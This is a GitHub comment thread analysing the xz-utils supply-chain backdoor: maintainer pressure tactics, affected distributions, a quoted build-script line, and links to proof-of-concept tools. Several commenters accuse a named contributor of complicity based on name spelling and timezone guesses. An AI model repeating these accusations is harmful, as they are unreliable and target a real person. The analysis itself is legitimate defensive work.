And I'm not even going to get into what I think of systemd architecture (oh good, you're going to dynload now. golf clap) because that's a whole international Come To Jesus™ meeting that needs to happen and I need to take my arthritis medication. (Spare me with the tone-policing surrounding libsystemd, it was "this is good for you take the medicine" adoption, it fixes so much operations architecture just do it, etc etc. Now here we are kvetching about systemd architecture.)

@mikebveil
Copy link

mikebveil commented Apr 2, 2024

I've seen this being shared as a POC, can anyone confirm? https://github.com/amlweems/xzbot

Looks legit to me, but note that the backdoor can only be exploited by the owner of the attacker's Ed448 private key. xzbot patches libxzma with a different key, so that people can experiment with triggering the exploit in a sandboxed environment. That's all.

@gonoph
Copy link

gonoph commented Apr 2, 2024

One thing I would like folks to deeply consider is the social engineering that went on, either maliciously or inadvertently.

The May 2022 message from Dennis Ens added some soft pressure to Lasse to implement some changes. Then, ~3 weeks later, Jigar Kumar adds several replies that are aggressive and borderline abusive to Lasse.

We again see this type of pressure 2 years later, when krygorin4545 pressures debian package maintainers to adopt a NMU version bump of xz-utils.

Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn't done an upload in 5 years.

Fedora considered this a serious bug and fixed it weeks ago

Evan Boehs' summary (you have linked above) has some interesting timelines about this interaction.

The social engineering aspect of this was mentioned on a mastodon thread, which I think every project contributor should take to heart:

RT Carol (Nichols || Goulding) ꙮ @carol@crabby.fyi

the lesson I'm choosing to take from xz, as an oss maintainer, is that anyone trying to pressure or guilt me into doing something should immediately be told no, for security reasons

RT mybarkingdogs @mybarkingdogs@freeradical.zone

@ carol This is literally a good lesson for EVERYONE in anything, not even just software.

Giving into pressure/guilt is DANGEROUS

In personal relationships, it's one of the worst mistakes: it tells an abuser/manipulator you're a target.

In anything financial, it's often a baited hook for a scam

In politics it gets you pulled into anything from outright far-right fascist bullshit like qanon to "left" (but not really left, obviously!) groups that are state-sponsored ops or personality cults

@gh-nate
Copy link

gh-nate commented Apr 2, 2024

@thesamesam
Copy link
Author

@gh-nate That looks wonderful. I'll add it now.

@thesamesam
Copy link
Author

@thijskh Fixing, thanks!

@dong-zeyu
Copy link

I believe Jia used a similar trick when first introducing the IFUNC implementation. User hansjans162 (I suspect it's just another identity of Jia) created the PR for IFUNC implementation instead of Jia himself, and Jia was below to emphasis the importance and made many suggestions. Then the situation became 2:1 and made Larhzu harder to refuse the PR even though he raised some concerns.

In a more general perspective, most maintainers will (implicitly) rate the importance of an issue/PR by the number of comments/upvotes/watches/etc. So an attacker can easily create some dummy identities to increase the exposure of the issue to the maintainers (like how Debian package maintainers were pressured) and even affect the decision of the maintainers.

@imv7
Copy link

imv7 commented Apr 2, 2024

ja existe automacao pra achar esses padroes de vulnerabilidades por todas as bibliotecas. como tb ja existe vulnerabilidades na blockchain, mas nada disso foi revelado ainda.

@orbea
Copy link

orbea commented Apr 2, 2024

I just want to point out that this exploit may not represent a single bad actor, but it could be an organized group of collaborators. Even a single username can be possibly shared by multiple different people.

@daniel-dona
Copy link

Just sharing this funny commit "Simplify SECURITY.md"...

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=af071ef7702debef4f1d324616a0137a5001c14c

-While both options are available, we prefer email. In any case, please
-provide a clear description of the vulnerability including:
-
-- Affected versions of XZ Utils
-- Estimated severity (low, moderate, high, critical)
-- Steps to recreate the vulnerability
-- All relevant files (core dumps, build logs, input files, etc.)
+While both options are available, we prefer email.

@NuLL3rr0r
Copy link

Just sharing this funny commit "Simplify SECURITY.md"...

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=af071ef7702debef4f1d324616a0137a5001c14c

-While both options are available, we prefer email. In any case, please
-provide a clear description of the vulnerability including:
-
-- Affected versions of XZ Utils
-- Estimated severity (low, moderate, high, critical)
-- Steps to recreate the vulnerability
-- All relevant files (core dumps, build logs, input files, etc.)
+While both options are available, we prefer email.

Lol, best commit message I've ever seen! Terse and to the point.

@shide1989
Copy link

JIA CHEONG TAN CIA JHEONG TAN CIA JHON EGTAN CIA JOHN AGENT CIA AGENT JOHN Case closed

💯

@thesamesam
Copy link
Author

Please try to keep the comments on this gist for new resources which need to be added to the doc, corrections, edits, or questions which appear not answered elsewhere. Thanks!

@ldarby2
Copy link

ldarby2 commented Apr 2, 2024

@thesamesam about the italics idea for new content, please don't, it's better if people just watch the changlog of this document: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27/revisions. The italics would need to be undone as they become older and that also puts changes into the changelog. Thanks.

@thesamesam
Copy link
Author

thesamesam commented Apr 2, 2024

@ldarby2 OK, thanks for the feedback!

@flybyray
Copy link

flybyray commented Apr 2, 2024

I pass all my day as read thread about this "attack", because it's not a vulnerability, it's an "attack" against OpenSources community.

Most people expressed their outrage but only less were aware what was really going on!

Modify code to inject payload from unittest "corrupted file", it's needs big knowledge. Target XZ when we know it's most usefull algorithme for compression and used directly in Linux kernel, this is not random.

At the time of writing this comment - only 2 occurences of the word "kernel" on this page. I will add another reference to the actual target of this supply chain attack.

consider xz binary provided via package would have integrated the blob and would be able to detect the generic build environment. the eval here:
https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36
could do harm for the generic vanilla kernel builds.
It would be called from here: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528 ask your self why they used sh as a pipe target and not as others (KBZIP2,LZMA,ZSTD,...) the tool itself. the shell process will populate a lot more background information useful to activate the payload injections.

as this is just commited short before public announcment of this CVE, we might just anticipate the time pressure on the attackers side. i guess they detected on their own the valgrind issues and that hteir buggy payload is already out. hence they were on time pressure to push things into the kernel world

https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/diff/?h=next-20240328&id2=757ea48c7452355bab0d0827cfa0b16f4fd780d8

@Gasu16
Copy link

Gasu16 commented Apr 2, 2024

This is a great resource and references most of the stuff I've found researching this myself so far. Great stuff.

I found a repo earlier by user @amlweems that has a very interesting write-up and project where he is prodding the payload called xzbot, where he has done some reverse engineering on it. Seems to heavily imply that this was supposed to be RCE when receiving a specific ED448 key payload.

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

This is just speculation on my part, but maybe waiting and scanning for detection of the key was part of why it caused such a delay in the sshd login process.

When the crc64_resolve() is invoked, it starts performing a check on various data from the dynamic linker, program arguments and additional checks on the environment.
After that, it starts to parsing the symbol tables in memory, this seems to be the issue which raises the 500ms lag on the ssh authentication flow

@dfl23
Copy link

dfl23 commented Apr 2, 2024

Same reason as people who know they should make some information half invisible to anyone debugging their backdoor at times still choose to converse about it in public forums because they think no one will understand the convo without insider information. Everyone has lapses and get sloppy at times, Jia Tan is just a person like we all.

Is he now ?
You're making a guess here.

Could be a single person, could be 3, could be a whole team.
Could be CIA, could be PRC...

@makotom
Copy link

makotom commented Apr 2, 2024

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

// That being said I understand there are enough other signals suggesting that glibc-based systems on AMD64 were targeted. Just being noisy in case I'm on a wrong understanding - apologies! 🙇

@thesamesam
Copy link
Author

(Sorry, I haven't had a chance to play with this, I did spin up a VM but I've been shattered. I still have the notes open and plan on poking.)

@fungilife
Copy link

fungilife commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected?
Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not).
You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

@Z-nonymous
Copy link

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

Yes, it could be an attempt to make it harder to identify what platform is target / protected though.

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real excempted targets.

Insert a Drake meme with "RCE on all Linuxes" vs "RCE on all Linux but the plaform I use"

@gh-nate
Copy link

gh-nate commented Apr 2, 2024

A walkthrough of the xz attack shell script.
An RC4 variant in Awk, what more could you want?
https://research.swtch.com/xz-scripthttps://hachyderm.io/@rsc/112200603337903320

@xry111
Copy link

xry111 commented Apr 2, 2024

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real excempted targets.

No. The code is:

eval `grep ^build=\'x86_64 config.status`

From info bash:

3.5.4 Command Substitution

Command substitution allows the output of a command to replace the
command itself. Command substitution occurs when a command is enclosed
as follows:

$(COMMAND)

or

`COMMAND`

Bash performs the expansion by executing COMMAND in a subshell
environment and replacing the command substitution with the standard
output of the command, with any trailing newlines deleted.

So after command substitution it becomes:

eval build='x86_64-pc-linux-gnu'

And yes the exit code is still discarded, but the command build='x86_64-pc-linux-gnu' is still executed by the shell. You can try an example:

cat > config.status << EOF
unrelated_thing_1='114514'
build='x86_64-linux-gnu'
unrelated_thing_2='1919810'
EOF

eval `grep ^build=\'x86_64 config.status`
echo $build

It will output x86_64-linux-gnu. So this line is not a no-op, it basically reads the variable "build" out of config.status.

@erinacio
Copy link

erinacio commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

You just misinterpreted what I means. Even a simple notice like "We're not affected." is sufficient in such case. A more comprehensive notice (like what Arch did) could be better, but not strictly required.

I think it's a basic responsibility for a distro maintainer to publish such notice. I didn't mean and never mean Debian or Red Hat or anything is superior and users should switch to them. Just because they're affected and they have a wide user adoption I took them as examples. openSUSE also published a great guide and was affected but because it seems to have less adoption I didn't list it in my original comment.

Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl?

Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

@Osiris-Team
Copy link

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

@Artoria2e5
Copy link

Artoria2e5 commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it shipped backdoored versions in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.) There is a clarification that libsystemd is not present, so it could not have affected sshd, but it's not the same level of assurance as "the code is simply not there".


@Osiris-Team XZ for Java is not known to be affected by this backdoor. It's not as easy to hide bad things in pure Java code...

@Gasu16
Copy link

Gasu16 commented Apr 2, 2024

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

It still considered to be safe at the moment, the latest commit have been done by the original authors, Jia Tan committed in January 2024, updating the README for bug report

https://git.tukaani.org/?p=xz-java.git;a=shortlog;pg=0
https://blog.sonatype.com/cve-2024-3094-the-targeted-backdoor-supply-chain-attack-against-xz-and-liblzma
https://security.apache.org/blog/cve-2024-3094/

@erinacio
Copy link

erinacio commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.
Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it's affected in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @​dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.)

Well I think a false-positive is tolerable in such case, especially given that the last section of the notice indicated that Arch might not be affected due to liblzma not dynamically linked to sshd. At that time we just didn't have enough understand about the backdoor. It was annoying but won't cause real damage, in contrast of a false-negative.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 2, 2024

@flybyray

The eval [...] could do harm for the generic vanilla kernel builds.

It could, indeed in theory, replace the whole script there with an early exit. It could even, in theory, manage to add a module to the kernel.

It does not though. There is simply no evidence of this attack having anything to do with the kernel.

The kernel's xz decompressor is extremely stripped down. It's been forked off since before JT took over. (This only means the decompressor is likely not backdoored. This would not stop a new version of malicious xz from adding a module.)

ask your self why they used sh as a pipe target and not as others (KBZIP2,LZMA,ZSTD,...) the tool itself. the shell process will populate a lot more background information useful to activate the payload injections.

The answer is right there in xz_wrap.sh, in case $SRCARCH in. Each architecture has its own branch/call/jump filters that help improve compression ratio by (reversibly) turning relative jump addresses into absolute addresses.

as this is just commited short before public announcment of this CVE

What is "this"? xz_wrap was recently changed by Lesse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

The more pertinent "time pressure" theory is from Solar Designer: https://www.openwall.com/lists/oss-security/2024/03/31/9. It turns out libsystemd decided to load liblzma lazily (dlopen()) in a future version, so if the payload isn't pushed out now, it would stop working soon.

@AdrianBunk
Copy link

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?

These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

@christoofar
Copy link

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

There's not one specific point in the chain that's a concern, there's like 10+ of them. And what's really disappointing to see is the rush to moan about focus of any particular part of the chain and squash any enthusiasm to rethink any part of it.

@dguerri
Copy link

dguerri commented Apr 2, 2024

Quick Docker setup based on xzbot, to demonstrate backdoor usage

@przemoc
Copy link

przemoc commented Apr 2, 2024

My attempt at collecting and organizing links related to xz backdoor (2024) aka CVE-2024-3094.

https://przemoc.github.io/xz-backdoor-links/
or
https://github.com/przemoc/xz-backdoor-links/blob/main/index.mm.md

Nothing new there (sorry for that), but for those that are late to the news (I guess it's less and less possible every minute) may slightly help navigate through various resources related to this topic.

@fungilife
Copy link

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Despite of what I read here and in openwall discussions, a slight doubt remains in my head. If systemd was portable in musl and packages were built like in debian/rh would the same mechanism be effective, or is musl making a difference elsewhere, as in the compiling and linking process of xz/lzma? Otherwise it seems that if sd_notify doesn't trigger a process the rest is just as dirt sitting besides library items, not replacing or modifying anything else.

By the way, arch had built two versions that were infected, 5.6.0-1 and 5.6.1-1, 5.6.1-2 was built from git not tarball with the distro's native tools, 5.6.1-3 was built from git.tukaani.org those are the discovered infected tar balls, but the same entity has signed tarballs further back retroactively.

@redcode
Copy link

redcode commented Apr 2, 2024

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Who are you to decide what the object should be here or how to narrow down what people want to investigate? Let Sam ask for whatever he wants, besides, the gist is his and he's doing a good job.

You are nobody's boss, so don't be impertinent.

@marco-silva0000
Copy link

How hard is it to be objective and civil these days?
This is the logging policy, https://libera.chat/policies/#public-logging
Also, I haven't seen any logs shared anywhere.
I think there's value on that type of analysis, but ultimately it can be considered out of scope of this gist by it's creator.

@orbea
Copy link

orbea commented Apr 2, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

@wibeipummedo
Copy link

wibeipummedo commented Apr 2, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent build failing' - different scenario, and kind of make sense, but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (https://github.com/python/cpython/pull/115989/files#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident. EDIT as said below by AdrianBunk and others, probably is just bad timing after all. NM

@DiagonalArg
Copy link

DiagonalArg commented Apr 3, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

Agreed. Also, discussing who, is necessary to work out the team or network of sockpuppets that may be involved. That may help identify other PR's that may be prongs of the attack, or other, as yet unidentified, attacks.

@christoofar
Copy link

cpython is just a binding project... all you should care about is Is The Binding Alive??? you would normally just compress and decompress some test string and call it a day.

There was ZERO reason to bring all that shit into the cpython repo. If you are so worried about the RISCV variant you would, as a client of the downstream lib, just testbed that.

This is not a coinkidink.

@christoofar
Copy link

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creating more targets.

This is a significant find.

@redcode
Copy link

redcode commented Apr 3, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

This guy claimed to be "an engineer from Bouffalo Lab", and his GitHub account was registered in 2015, 1 year before Bouffalo was founded (2016). Bouffalo Lab has products that use RISC-V cores, for example this one.

Looking at his commits, I see that sometimes he uses an email with domain bouffalolab.com, and other times, when he merges PRs, etc, another one with his personal domain. A priori he does not look like a spy/hacker.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creating more targets.

This is a significant find.

Interesting... maybe he was being manipulated by Jia Tan?

His website consists of a blog with a single post about liblzma written this year (March 9th).

@AdrianBunk
Copy link

cpython is just a binding project...

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creating more targets.

It might be better for @christoofar to stop commenting here since he is only making a fool out of himself.

The tinkerboard community is a rather small part of the Linux community, without any real influence on anything.
And "cpython is just a binding project" is, well, the same as saying "I don't have the slightest clue what I am talking about".

@thesamesam
Copy link
Author

thesamesam commented Apr 3, 2024

@AdrianBunk I have IRC logs but I don't want to post them publicly because it feels wrong. In part because it is affecting other members of the community.

I will share with any official bodies who request it, also Lasse who has his own, but wants to be able to verify them against mine. Also open to any other reasonable requests. I just don't want to dump them en-masse either.

I appreciate this might be a bit controversial but I don't want to throw out every norm we have in FOSS either.

@thesamesam
Copy link
Author

@JohnVeness Thank you, fixing!

@lhmouse
Copy link

lhmouse commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

@duanqn
Copy link

duanqn commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

It is unusual but I don't think the name spelling itself is enough to call him/her 'suspicious'.

@christoofar
Copy link

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

I'm going to go with the theory that this is Jia Team Partner 2. I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

@thesamesam

@AdrianBunk
Copy link

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

@wibeipummedo

"Person was perhaps just excited" is likely "Person is paid to improve RISC-V support".

As @redcode already mentioned is a person who is active for a decade in Github, it looks quite different to the identities of the attacker.

The test files are in this test were just used in a small testcase to compare whether the output is as expected.

The exploit is that liblzma was used to add a backdoor to one specific program (sshd), none of that could have added a backdoor to Python by accident.

Python upstream seems happy with the general change and not suspicious even after the xz exploit is known.

There is nothing that strikes me about this person as being part of the attack, "poor timing" would be my first impression.

@christoofar
Copy link

christoofar commented Apr 3, 2024

cpython is just a binding project...

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creating more targets.

It might be better for @christoofar to stop commenting here since he is only making a fool out of himself.

The tinkerboard community is a rather small part of the Linux community, without any real influence on anything. And "cpython is just a binding project" is, well, the same as saying "I don't have the slightest clue what I am talking about".

I use CPython a lot. I know what's going on here.

The enhancement Jia made is for RISCV. Who, using CPython, is going to get excited about that feature. Use your brain.

@christoofar
Copy link

There is nothing that strikes me about this person as being part of the attack, "poor timing" would be my first impression.

Whatever you say, Jia.

@AdrianBunk
Copy link

@thesamesam Yes, that's what I meant with "being analyzed". People at law enforcement who are doing that professionally.

@wibeipummedo
Copy link

@AdrianBunk

The test files are in this test were just used in a small testcase to compare whether the output is as expected.

Fair enough. I was worried as noticed they were the new ones in 5.6.1 that Jia Tan had added. Wondered what they might do when decompressed, if like other ones in infographic https://infosec.exchange/@fr0gger/112189232773640259

The exploit is that liblzma was used to add a backdoor to one specific program (sshd), none of that could have added a backdoor to Python by accident.

Yeah. I was reading about the 'extension' feature in the malicious code and wonder if this was part of some other vector, maybe affect cpython at build time for some future exploit. But probably (hopefully) not. Just 'jumping at shadows' now :)

There is nothing that strikes me about this person as being part of the attack, "poor timing" would be my first impression.

Yeah, I hope you right! Thanks.

@christoofar
Copy link

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in.
https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

@gonoph
Copy link

gonoph commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious

Chien Wong - I looked at his github:

  • Created in 2015
  • bunch of activity in the last year 2023+
  • 2020, started putting in some activity into other repos
  • "lessons learned from lzma" post was created 3 weeks ago
  • created his homepage on github pages 4 months ago

The only anomaly is: GitHub says his profile is in Nanjing, China, with a TZ of GMT+08, but:

  • created the current home page on Christmas Eve (Dec 24th, 2023)
  • then updated his 404 page for New Years (Jan 1st, 2024)

However, not a smoking gun of anything at this point.

In fact, if you use the Internet Archive (TW:language) to view his past incarnations, you can see it was hosted since 2015 as well. Interesting enough, on the 2017 copy of the website, his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

